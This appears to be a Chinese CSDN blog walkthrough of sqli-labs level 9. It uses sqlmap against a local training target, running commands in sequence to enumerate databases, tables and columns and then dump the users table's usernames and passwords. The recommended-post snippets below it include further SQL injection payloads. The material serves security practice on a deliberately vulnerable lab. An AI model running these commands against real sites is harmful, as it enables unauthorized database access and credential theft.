sqli 第9关闯关(sqlmap)

最新推荐文章于 2024-04-10 21:45:28 发布
最新推荐文章于 2024-04-10 21:45:28 发布
阅读量75 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laykr/article/details/134041533
版权

sqlmap

1.探测哪里有注入点

2.python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" --dbs -batch

我这里是因为本地已经有3.8的python了,所以为了指定用2.7版本python打开sqlmap所以前面有python2

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -current-db

3.探测表

找到当前数据库是security,探测有什么表

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -D security  --tables

4.探测users表对应的列

找到security数据库下有users表,我们目标是为了窃取账户信息,那接下来肯定要开始探测列了

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -D security  -T users --columns

5.爆数据了(dump)

现在已经找到username与password那么就开始爆这两列的数据

python2 sqlmap.py -u "http://127.0.0.1/sqli/Less-9/?id=1" -D security  -T users -C username,password --dump

如果你不用dump的话,是不会显示username与password的,dump是存储的意思,现在打开你的sqlmap保存地址

里面就会写入,

在我们用过一次sqlmap之后,应该--purge让sqlmap把缓存都清除掉

shinyorb
关注
靶场系列:sqllibs安装、sqli-labs靶场搭建以及闯关(1-22
weixin_54626591的博客
12-05 2906
sqllibs安装、sqli-labs靶场搭建以及闯关(1-22
sql-lab闯关tips 第八
weixin_44089266的博客
04-06 400
**第八为布尔型盲注 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅 ** 未知闭合方式下,先构造payload http://192.168.226.136/sqli-labs-master/Less-8/?id=1 正常回显 尝试加入单引号,构造闭合 http://192.168.226.136/sqli-labs-mast...
sqli-libs闯关记录
weixin_45937436的博客
05-07 579
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 方法一:手工UNION联合查询注入 输入单引号,页面错误,如下: 根据报错信息,可以确定输入参数的内容被存放到一对单引号中间, 猜想:咱们输入的1在数据库中出现的位置为:select … from … where id=’1’ …, 也可以查看sqli-lab中...
sqli-labs闯关1-2
Darklord.W
07-01 167
sqli-labs闯关1-2 进入页面http://43.247.91.228:84/Less-2/ 输入?id=1 http://43.247.91.228:84/Less-2/?id=1 输入?id=1’ http://43.247.91.228:84/Less-2/?id=1’ 输入?id=1 and 1=1 http://43.247.91.228:84/Less-2/?id=1 and ...
sqllabs 闯关wp
wsitcj的博客
07-20 264
Less 1 首先先测试为字符型,并且干扰字符为 单引号 ,所以构造语句如下 http://192.168.9.128/sqli-labs/Less-1/?id=1%27%20--+ 爆字段 http://192.168.9.128/sqli-labs/Less-1/?id=1' order by 3--+ 爆表 不要忘了 group_concat 函数 http://192.168.9.128/sqli-labs/Less-1/?id=999' union select 1,group_con
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2604
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
【渗透测试】sqli-labs闯关(1-10)
qq_43168364的博客
04-20 563
第一
sqli-labs闯关记录1-53
weixin_43938446的博客
03-28 353
白冒-红帽-黑冒。从点点滴滴做起
sql-lab闯关 第九~十
weixin_44089266的博客
04-08 590
**第九为时间型盲注 提前声明:本机测试地址为 192.168.226.136 以下仅供参考,切勿用作其他用途,若有错误之处,望见谅 ** 未知闭合方式下,先构造payload http://192.168.226.136/sqli-labs-master/Less-9/?id=1 回显正常 之后经过尝试,无论输入什么都会显示You are in… 所以之前的所有方法都已经失效,考虑使用时...
sql注入靶场闯关Basic(11-15POST型)详细版
最新发布
Zqinglele的博客
04-10 1026
1.从这开始变成登录框输入,尝试登录一下,只有一个登录错误回显2.在用户名处使用 ' 进行注释,发现出现了sql语句错误提醒,说明是通过单引号进行闭合。
当黑客就入门 SQLi-Labs 1-20 详细攻略
Tuye的博客
07-15 1229
SQLi-Lab 攻略13123
利用DVWA学习sqlmap(1)
csu_vc的博客
07-17 8453
首先我们要在一台机器上配置dvwa环境下载地址 https://github.com/ethicalhack3r/DVWA 把DVWA的源代码下载好之后,我们需要在受害机器上配置web服务,并配置dvwa 这里我使用的是phpstudy,因为它比较方便 把dvwa的源代码解压到phpstudy的www目录下,并到./config目录下修改配置文件把root和passwd修改为当前机器的数据库
sql的学习以及sqli-lab靶场练习
RealIiikun的博客
03-07 648
sqlilab的靶场练习
Sqli-Labs闯关——更新中
qq_18669681的博客
09-21 345
Sqli-Labs闯关Less-1 Less-1 正常访问: 一、判断 1 and 1=2 //访问正常,不是数值查询 1' //报错,可能为sql字符注入 1' --+//返回正常,所以为单引号字符注入 注: 1、我使用的是 --+来注释sql后面的语句,+的作用是,它在解析的时候会被解析为空格,用来隔开 --与后面语句。 2、#注释也是可行的,但在浏览器的url中,他是被用来指导...
暑期练习web21:sqli lab闯关赛1-4
qq_41618162的博客
08-23 401
经学长推荐准备刷一刷sqli lab这个闯关赛,提高一波 第一 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先我们输入?id=1‘测试一下,于是就提示这里是有漏洞的,而且是一个字符型注入,最后面的limit 0,1要注意了,每次只显示一行 接着用order by测试字段数,直到3还是正常的,所以有三...
sqli-labs闯关(附python脚本和sqlmap使用)
xixixi
09-20 3166
重新学这个的原因 sql注入生疏了 想学得更深入 学习写python脚本 开始前的说明 每一个脚本 需寻找flag 每天更新 因为刚开始写python脚本,可能代码不够完美,请见谅。进度比较慢,请见谅。 第一 手工注入: -1' order by 3 --+ -1' union select 1,database(),3 --+ -1' union select 1,...
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1713
sql-labs 第5~10 盲注系列
SQL注入之sqlmap爆破sqli-labs-master
龙乐的专栏
08-23 9904
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。 GET型的sqlmap爆破。 1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库中数据表:python sqlmap.py -u http://loc
SQL注入——sqli-labs靶场闯关(13~20)
m0re's blog
04-30 1511
本文目录 前言:SQL注入必须要拿下,所以继续学习并在靶场实验。 再次学习SQL注入知识,再补充一些基本知识。 注入通过在URL中修改对应的id值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜扛 来探测是否存在注入点。 ...
sqli dumb闯关
07-28
回答: 在sqli dumb闯关中,根据引用\[1\],\[2\]和\[3\]提供的方法,可以使用不同的注入方式来进行攻击。其中包括使用xpath报错注入、联合查询和POST型注入等方法。在每一中,需要根据具体情况判断闭合方式、列数...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值